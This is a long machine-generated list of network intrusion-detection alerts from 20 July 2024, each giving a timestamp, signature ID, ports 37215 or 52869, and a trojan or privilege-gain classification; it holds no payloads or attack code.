                      Timestamp:07/20/24-23:01:24.916250
                      SID:2835222
                      Source Port:59644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.060408
                      SID:2027339
                      Source Port:34238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.589327
                      SID:2027339
                      Source Port:43516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.638879
                      SID:2831300
                      Source Port:51800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2829579
                      Source Port:43212
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327540
                      SID:2831300
                      Source Port:57014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.721561
                      SID:2027339
                      Source Port:39272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.878047
                      SID:2831300
                      Source Port:43212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.530468
                      SID:2831300
                      Source Port:59786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.148144
                      SID:2835222
                      Source Port:47490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2835222
                      Source Port:49900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2829579
                      Source Port:52316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2835222
                      Source Port:38846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.525128
                      SID:2027339
                      Source Port:45820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.755147
                      SID:2831300
                      Source Port:51278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.807102
                      SID:2027339
                      Source Port:54648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.992845
                      SID:2025132
                      Source Port:48958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.955471
                      SID:2025132
                      Source Port:46232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.619597
                      SID:2831300
                      Source Port:40584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2829579
                      Source Port:41534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.553791
                      SID:2027339
                      Source Port:33484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2829579
                      Source Port:44342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.179680
                      SID:2025132
                      Source Port:59814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.837054
                      SID:2025132
                      Source Port:56282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.208558
                      SID:2831300
                      Source Port:55192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.648489
                      SID:2829579
                      Source Port:56996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.082957
                      SID:2025132
                      Source Port:33200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.572556
                      SID:2027339
                      Source Port:33738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.700029
                      SID:2831300
                      Source Port:44644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.479337
                      SID:2027339
                      Source Port:43420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.928503
                      SID:2025132
                      Source Port:35990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.572517
                      SID:2027339
                      Source Port:43378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2829579
                      Source Port:50384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.609463
                      SID:2831300
                      Source Port:57762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.406934
                      SID:2829579
                      Source Port:55706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818842
                      SID:2835222
                      Source Port:35052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.729822
                      SID:2835222
                      Source Port:47494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221583
                      SID:2835222
                      Source Port:44458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2835222
                      Source Port:51614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.016319
                      SID:2831300
                      Source Port:41614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.639622
                      SID:2027339
                      Source Port:57320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.625081
                      SID:2025132
                      Source Port:59666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.117244
                      SID:2027339
                      Source Port:35798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.520226
                      SID:2025132
                      Source Port:52308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.199235
                      SID:2025132
                      Source Port:49528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2835222
                      Source Port:47164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572790
                      SID:2027339
                      Source Port:49150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2829579
                      Source Port:45012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.206220
                      SID:2025132
                      Source Port:46404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.484243
                      SID:2027339
                      Source Port:48602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.430069
                      SID:2027339
                      Source Port:59360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.799973
                      SID:2025132
                      Source Port:41598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.052569
                      SID:2025132
                      Source Port:34074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2829579
                      Source Port:53018
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.258056
                      SID:2025132
                      Source Port:44682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.887574
                      SID:2025132
                      Source Port:53000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.883801
                      SID:2027339
                      Source Port:55112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.560388
                      SID:2027339
                      Source Port:50314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.325694
                      SID:2831300
                      Source Port:40536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.967403
                      SID:2027339
                      Source Port:46110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.604763
                      SID:2831300
                      Source Port:58346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.033190
                      SID:2831300
                      Source Port:48642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.326982
                      SID:2831300
                      Source Port:60500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.999991
                      SID:2835222
                      Source Port:43104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.607816
                      SID:2027339
                      Source Port:33276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.023836
                      SID:2027339
                      Source Port:43992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.006905
                      SID:2027339
                      Source Port:38194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2829579
                      Source Port:37594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2835222
                      Source Port:45144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631549
                      SID:2835222
                      Source Port:37214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327808
                      SID:2831300
                      Source Port:46250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.826575
                      SID:2027339
                      Source Port:42546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.123752
                      SID:2027339
                      Source Port:37998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.150064
                      SID:2831300
                      Source Port:34880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.556921
                      SID:2027339
                      Source Port:50918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.732773
                      SID:2027339
                      Source Port:53080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.881853
                      SID:2027339
                      Source Port:41344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.713934
                      SID:2831300
                      Source Port:37610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.260197
                      SID:2027339
                      Source Port:42514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2835222
                      Source Port:53032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.722890
                      SID:2027339
                      Source Port:38548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222009
                      SID:2835222
                      Source Port:36512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:03.068984
                      SID:2027339
                      Source Port:52552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.719940
                      SID:2831300
                      Source Port:37788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.854322
                      SID:2025132
                      Source Port:46292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.176893
                      SID:2025132
                      Source Port:41980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2829579
                      Source Port:40180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.143923
                      SID:2025132
                      Source Port:44316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:14.686790
                      SID:2025132
                      Source Port:35484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.786028
                      SID:2831300
                      Source Port:56518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2829579
                      Source Port:42160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.277117
                      SID:2027339
                      Source Port:58846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.595913
                      SID:2027339
                      Source Port:52276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:53.715694
                      SID:2027339
                      Source Port:33080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.901722
                      SID:2027339
                      Source Port:32886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.990165
                      SID:2829579
                      Source Port:44634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.248064
                      SID:2025132
                      Source Port:51126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.965873
                      SID:2027339
                      Source Port:51534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:35.459810
                      SID:2027339
                      Source Port:34686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.047497
                      SID:2027339
                      Source Port:32834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.418920
                      SID:2025132
                      Source Port:56400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2835222
                      Source Port:50138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.679677
                      SID:2831300
                      Source Port:56988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.580745
                      SID:2027339
                      Source Port:42542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.140869
                      SID:2027339
                      Source Port:59542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.972649
                      SID:2027339
                      Source Port:47400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.709583
                      SID:2027339
                      Source Port:48606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:21.004725
                      SID:2027339
                      Source Port:58336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045143
                      SID:2829579
                      Source Port:47788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053061
                      SID:2835222
                      Source Port:36910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.199976
                      SID:2025132
                      Source Port:48278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:21.004725
                      SID:2831300
                      Source Port:56508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2835222
                      Source Port:60776
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.637960
                      SID:2027339
                      Source Port:55360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2829579
                      Source Port:38206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.366575
                      SID:2831300
                      Source Port:33730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.173843
                      SID:2025132
                      Source Port:48376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.670285
                      SID:2831300
                      Source Port:55610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.286911
                      SID:2027339
                      Source Port:33388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.612377
                      SID:2027339
                      Source Port:60004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.671155
                      SID:2027339
                      Source Port:49994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.869520
                      SID:2025132
                      Source Port:58910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.260197
                      SID:2027339
                      Source Port:45464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2835222
                      Source Port:56188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.413915
                      SID:2831300
                      Source Port:38334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.353271
                      SID:2027339
                      Source Port:59452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.288562
                      SID:2027339
                      Source Port:38350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2829579
                      Source Port:60714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.072080
                      SID:2025132
                      Source Port:56664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.063335
                      SID:2831300
                      Source Port:51140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.869521
                      SID:2831300
                      Source Port:56828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.360712
                      SID:2027339
                      Source Port:37410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2829579
                      Source Port:36122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.075399
                      SID:2027339
                      Source Port:35962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.092655
                      SID:2025132
                      Source Port:53282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.082683
                      SID:2027339
                      Source Port:49892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.078337
                      SID:2027339
                      Source Port:40646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.181097
                      SID:2831300
                      Source Port:34490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.584506
                      SID:2027339
                      Source Port:57902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.535708
                      SID:2027339
                      Source Port:41514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2835222
                      Source Port:44010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975158
                      SID:2829579
                      Source Port:58822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2835222
                      Source Port:37002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2829579
                      Source Port:52632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2829579
                      Source Port:59270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.470759
                      SID:2831300
                      Source Port:44516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.970621
                      SID:2027339
                      Source Port:51010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.701127
                      SID:2025132
                      Source Port:52112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2835222
                      Source Port:58660
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.159489
                      SID:2025132
                      Source Port:52240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2835222
                      Source Port:45666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.990022
                      SID:2027339
                      Source Port:56464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.872561
                      SID:2027339
                      Source Port:45328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.665550
                      SID:2027339
                      Source Port:60378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.392835
                      SID:2027339
                      Source Port:36384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.971718
                      SID:2027339
                      Source Port:52574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.946379
                      SID:2025132
                      Source Port:46328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:10.031806
                      SID:2027339
                      Source Port:43076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043880
                      SID:2835222
                      Source Port:49064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2835222
                      Source Port:46626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.011895
                      SID:2025132
                      Source Port:43950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2835222
                      Source Port:59956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.962852
                      SID:2027339
                      Source Port:34886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.038268
                      SID:2027339
                      Source Port:51568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.553447
                      SID:2027339
                      Source Port:48814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.632446
                      SID:2831300
                      Source Port:53810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.293475
                      SID:2025132
                      Source Port:48050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:43.072508
                      SID:2025132
                      Source Port:43146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.139692
                      SID:2025132
                      Source Port:58250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.303455
                      SID:2027339
                      Source Port:42292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.660100
                      SID:2829579
                      Source Port:40954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.995637
                      SID:2027339
                      Source Port:58774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.627181
                      SID:2027339
                      Source Port:49196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2835222
                      Source Port:39532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.101402
                      SID:2025132
                      Source Port:34722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.512136
                      SID:2831300
                      Source Port:59352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.947418
                      SID:2027339
                      Source Port:44360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.841155
                      SID:2831300
                      Source Port:47910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2835222
                      Source Port:35748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.362240
                      SID:2025132
                      Source Port:42968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
